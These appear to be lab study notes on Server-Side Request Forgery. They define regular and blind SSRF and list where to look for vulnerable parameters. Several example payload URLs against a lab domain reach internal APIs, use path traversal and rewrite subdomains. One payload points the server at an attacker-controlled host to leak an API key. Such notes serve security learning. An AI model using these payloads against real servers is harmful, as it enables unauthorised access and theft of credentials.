Server-Side Request Forgery - Attacker modifying the request payload to access unintended areas.

• Regular SSRF where data is returned to the attacker’s screen.
• Blind SSRF where SSRF occurs but data is not returned to the attacker’s screen.

A successful SSRF attack can,

• Access to unauthorized areas
• Access to customer/organizational data
• Ability to scale to internal networks
• Reveal authentication tokens/credentials.

For better understanding

<http://website.thm/stock?url=http://api.website.thm/api/stock/item?id=123>
<http://website.thm/stock?url=http://api.website.thm/api/user>       -- SSRF Payload

We can use directory traversal here,
<http://website.thm/stock?url=/item?id=123>
<http://website.thm/stock?url=/../user>                              -- SSRF Payload

Modifying the server's subdomain to which the request is made,
<http://website.thm/stock?server=api&id123>
<http://website.thm/stock?server=api.website.thm/api/user&x=&id=123> -- SSRF Payload

Forcing to webserver to request attacker's server hence revealing API key,
<http://website.thm/stock?url=http://api.website.thm/api/stock/item?id=123>
<http://website.thm/stock?url=http://hacker-domain.thm/>             -- SSRF Payload

Finding a SSRF

• When a full URL is a parameter in address bar
• A hidden field in a form
• A partial URL such as just the hostname
• only the path of the URL

When working with blind SSRF where no result is available on the screen, need to use a HTTP logging tool such as requestbin.com, your own HTTP server or Burp Suite’s Collaborator client.

Defeating common SSRF defenses